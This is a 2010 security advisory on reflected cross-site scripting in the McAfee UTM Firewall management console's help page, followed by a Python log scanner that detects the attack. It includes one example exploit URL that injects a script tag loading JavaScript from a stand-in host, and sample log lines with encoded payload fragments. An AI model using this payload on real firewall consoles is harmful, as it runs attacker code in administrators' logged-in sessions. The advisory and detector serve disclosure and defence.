McAfee UTM Firewall Help Reflected Cross-Site Scripting

2010.06.17
Credit: Adam Baldwin
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Advisory Information

Advisory ID: NGENUITY-2010-005
Date published: 6/9/2010

Vulnerability Information

Class: Reflected Cross-Site Scripting (XSS)

Software Description

McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the affected product line. More information can be found at https://kc.mcafee.com/corporate/index?page=content&id=SB10010 <http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html>

Vulnerability Description

The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting. It could allow an attacker to cause a user to execute attacker-supplied JavaScript code. This attack requires the target to have an existing valid session logged into the UTM device and the attacker to know the internal IP address of the UTM device.

McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability.

Timeline:

1/21/2010 - McAfee notified of vulnerability, provided with proof of concept
6/9/2010 - McAfee notified nGenuity of available fix and related information

Technical Description

Example Exploit URL:

hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block?><script src=?http://example.com/xss.js?></script>

Original Posting: http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/

References:

https://kc.mcafee.com/corporate/index?page=content&id=SB10010
http://www.vupen.com/english/advisories/2010/1413
http://www.securitytracker.com/id?1024091
http://www.securityfocus.com/archive/1/archive/1/511771/100/0/threaded
http://secunia.com/advisories/40138
http://secunia.com/advisories/40089
http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/
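
A detection-side check for the request pattern the advisory describes, added here as an example (it is not code from nGenuity or McAfee). It scans access or proxy log lines for requests to the help CGI whose page parameter carries anything other than a plain page name. The Common Log Format input, the allow-list of characters and the function names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

HELP_PATH = "/cgi-bin/cgix/help"            # path from the advisory
SAFE_PAGE = re.compile(r"[A-Za-z0-9_.-]*")  # assumed shape of a legitimate page name
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

# Constructed sample lines (Common Log Format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2010:10:00:01 +0000] "GET /cgi-bin/cgix/help?&page=web_list_block HTTP/1.1" 200 5120',
    '10.0.0.7 - - [09/Jun/2010:10:02:13 +0000] "GET /cgi-bin/cgix/help?&page=web_list_block%22%3E%3Cscript%3E HTTP/1.1" 200 5180',
    '10.0.0.7 - - [09/Jun/2010:10:02:40 +0000] "GET /cgi-bin/cgix/help?&page=x%2522%253E HTTP/1.1" 200 5130',
    '10.0.0.9 - - [09/Jun/2010:10:03:02 +0000] "GET /index.html?page=%3Cb%3E HTTP/1.1" 404 210',
]

def page_values(query):
    """Yield the decoded value of every 'page' parameter in a raw query string."""
    for part in query.split("&"):
        name, sep, value = part.partition("=")
        if sep and name == "page":
            # Decode twice so double-encoded markup (%253C) is also seen.
            yield unquote(unquote(value.replace("+", " ")))

def is_suspicious(request_target):
    """True when the help CGI is requested with a page value outside the allow-list."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/") != HELP_PATH:
        return False
    return any(SAFE_PAGE.fullmatch(v) is None for v in page_values(parts.query))

def scan(log_lines):
    """Return the log lines whose request target matches the advisory's pattern."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", hit)
```

An allow-list on the parameter value catches encoded and double-encoded markup without having to enumerate payloads. Firmware 4.0.7 remains the fix the advisory names.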


Copyright 2024, cxsecurity.com